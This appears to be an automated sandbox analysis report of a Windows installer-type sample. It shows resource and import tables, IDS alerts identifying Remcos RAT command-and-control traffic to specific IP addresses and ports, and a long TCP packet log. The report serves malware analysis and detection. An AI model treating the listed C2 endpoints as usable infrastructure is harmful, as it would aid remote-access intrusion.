RT_ICON	0x58bb0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.10965419381963422
RT_ICON	0x62058	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.13382624768946397
RT_ICON	0x674e0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.13350259801606046
RT_ICON	0x6b708	0x2ead	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9818394844756884
RT_ICON	0x6e5b8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.19533195020746888
RT_ICON	0x70b60	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.25422138836772984
RT_ICON	0x71c08	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.3635245901639344
RT_ICON	0x72590	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.4787234042553192
RT_DIALOG	0x729f8	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0x72b18	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x72c38	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x72d00	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x72d60	0x84	data	English	United States	0.7348484848484849
RT_VERSION	0x72de8	0x290	MS Windows COFF PA-RISC object file	English	United States	0.5228658536585366
RT_MANIFEST	0x73078	0x422	XML 1.0 document, ASCII text, with very long lines (1058), with no line terminators	English	United States	0.5122873345935728

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-13T08:50:06.791648+0100	2036594	ET JA3 Hash - Remcos 3.x/4.x TLS Connection	1	192.168.11.20	49717	192.169.69.26	2889	TCP
2024-12-13T08:50:35.665130+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.11.20	49714	172.217.215.102	443	TCP
2024-12-13T08:50:48.350112+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.11.20	49716	192.169.69.26	2879	TCP
2024-12-13T08:50:49.555506+0100	2032776	ET MALWARE Remcos 3.x Unencrypted Checkin	1	192.168.11.20	49718	172.111.244.113	2879	TCP
2024-12-13T08:50:49.800765+0100	2032777	ET MALWARE Remcos 3.x Unencrypted Server Response	1	172.111.244.113	2879	192.168.11.20	49718	TCP
2024-12-13T08:50:50.582431+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.11.20	49719	178.237.33.50	80	TCP
2024-12-13T08:53:00.444282+0100	2032777	ET MALWARE Remcos 3.x Unencrypted Server Response	1	172.111.244.113	2879	192.168.11.20	49718	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 08:50:35.169603109 CET	49714	443	192.168.11.20	172.217.215.102
Dec 13, 2024 08:50:35.169620037 CET	443	49714	172.217.215.102	192.168.11.20
Dec 13, 2024 08:50:35.169737101 CET	49714	443	192.168.11.20	172.217.215.102
Dec 13, 2024 08:50:35.182007074 CET	49714	443	192.168.11.20	172.217.215.102
Dec 13, 2024 08:50:35.182020903 CET	443	49714	172.217.215.102	192.168.11.20
Dec 13, 2024 08:50:35.423099041 CET	443	49714	172.217.215.102	192.168.11.20
Dec 13, 2024 08:50:35.423355103 CET	49714	443	192.168.11.20	172.217.215.102
Dec 13, 2024 08:50:35.424644947 CET	443	49714	172.217.215.102	192.168.11.20
Dec 13, 2024 08:50:35.424949884 CET	49714	443	192.168.11.20	172.217.215.102
Dec 13, 2024 08:50:35.451565981 CET	49714	443	192.168.11.20	172.217.215.102
Dec 13, 2024 08:50:35.451603889 CET	443	49714	172.217.215.102	192.168.11.20
Dec 13, 2024 08:50:35.452393055 CET	443	49714	172.217.215.102	192.168.11.20
Dec 13, 2024 08:50:35.452543974 CET	49714	443	192.168.11.20	172.217.215.102
Dec 13, 2024 08:50:35.457572937 CET	49714	443	192.168.11.20	172.217.215.102
Dec 13, 2024 08:50:35.498347998 CET	443	49714	172.217.215.102	192.168.11.20
Dec 13, 2024 08:50:35.665188074 CET	443	49714	172.217.215.102	192.168.11.20
Dec 13, 2024 08:50:35.665283918 CET	443	49714	172.217.215.102	192.168.11.20
Dec 13, 2024 08:50:35.665371895 CET	49714	443	192.168.11.20	172.217.215.102
Dec 13, 2024 08:50:35.665463924 CET	49714	443	192.168.11.20	172.217.215.102
Dec 13, 2024 08:50:35.665486097 CET	443	49714	172.217.215.102	192.168.11.20
Dec 13, 2024 08:50:35.665622950 CET	49714	443	192.168.11.20	172.217.215.102
Dec 13, 2024 08:50:35.665688038 CET	49714	443	192.168.11.20	172.217.215.102
Dec 13, 2024 08:50:35.829900980 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:35.829935074 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:35.830173969 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:35.830348015 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:35.830368996 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:36.075802088 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:36.076020956 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:36.079479933 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:36.079499006 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:36.079925060 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:36.080051899 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:36.080313921 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:36.122215033 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:38.986263990 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:38.986468077 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:38.986468077 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.002549887 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.002784014 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.002826929 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.019201040 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.019440889 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.019476891 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.019705057 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.100526094 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.100733042 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.100770950 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.100985050 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.104718924 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.104882002 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.104918003 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.105120897 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.113007069 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.113217115 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.113255024 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.113415003 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.121316910 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.121503115 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.121543884 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.121731997 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.129626989 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.129869938 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.129906893 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.130090952 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.137981892 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.138180971 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.138226986 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.138438940 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.146343946 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.146559954 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.146595955 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.146859884 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.154599905 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.154774904 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.154810905 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.155039072 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.162853003 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.163078070 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.163115025 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.163347006 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.171139956 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.172079086 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.172117949 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.172594070 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.179433107 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.179647923 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.179685116 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.179936886 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.187735081 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.187968016 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.188004017 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.188189983 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.195971966 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.196141958 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.196177959 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.196342945 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.204282999 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.204459906 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.204497099 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.204777002 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.214865923 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.215044022 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.215060949 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.215233088 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.219387054 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.219563007 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.219572067 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.219728947 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.225747108 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.226068020 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.226079941 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.226219893 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.232127905 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.232595921 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.232633114 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.232983112 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.237773895 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.238051891 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.238069057 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.238279104 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.243546963 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.243864059 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.243884087 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.244148016 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.249444008 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.249655962 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.249696016 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.249865055 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.255219936 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.255494118 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.255533934 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.255714893 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.261007071 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.261213064 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.261251926 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.261459112 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.266820908 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.267024040 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.267066002 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.267250061 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.272531986 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.272722006 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.272758007 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.272975922 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.278315067 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.278579950 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.278620005 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.278888941 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.284058094 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.284281015 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.284322977 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.284486055 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.289855957 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.290080070 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.290118933 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.290328026 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.295358896 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.295557976 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.295595884 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.295793056 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.300887108 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.301095009 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.301136971 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.301393986 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.306116104 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.306341887 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.306380987 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.306607962 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.311209917 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.311534882 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.311570883 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.311849117 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.316267967 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.316467047 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.316508055 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.316751957 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.321202040 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.321413040 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.321449995 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.321676016 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.326172113 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.326443911 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.326479912 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.326708078 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.331021070 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.331243992 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.331279993 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.331531048 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.335822105 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.336105108 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.336141109 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.336384058 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.340671062 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.340861082 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.340900898 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.341082096 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.343508959 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.343842030 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.343882084 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.344126940 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.346453905 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.346724033 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.346760035 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.346978903 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.349284887 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.349524975 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.349564075 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.349809885 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.352138042 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.352353096 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.352392912 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.352561951 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.354890108 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.355099916 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.355135918 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.355331898 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.357805014 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.357989073 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.358025074 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.358175039 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.360656977 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.360847950 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.360886097 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.361068964 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.363431931 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.363625050 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.363661051 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.363862991 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.366113901 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.366357088 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.366393089 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.366678953 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.368927956 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.369200945 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.369236946 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.369453907 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.371670008 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.371891975 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.371928930 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.372133017 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.374485016 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.374666929 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.374703884 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.374867916 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.377166986 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.377399921 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.377435923 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.377610922 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.379903078 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.380112886 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.380148888 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.380322933 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.382594109 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.382766008 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.382848978 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.383147001 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.385205984 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.385493040 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.385529041 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.385796070 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.387933969 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.388133049 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.388169050 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.388348103 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.390528917 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.390746117 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.390783072 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.390929937 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.393104076 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.393296957 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.393333912 CET	443	49715	108.177.122.132	192.168.11.20
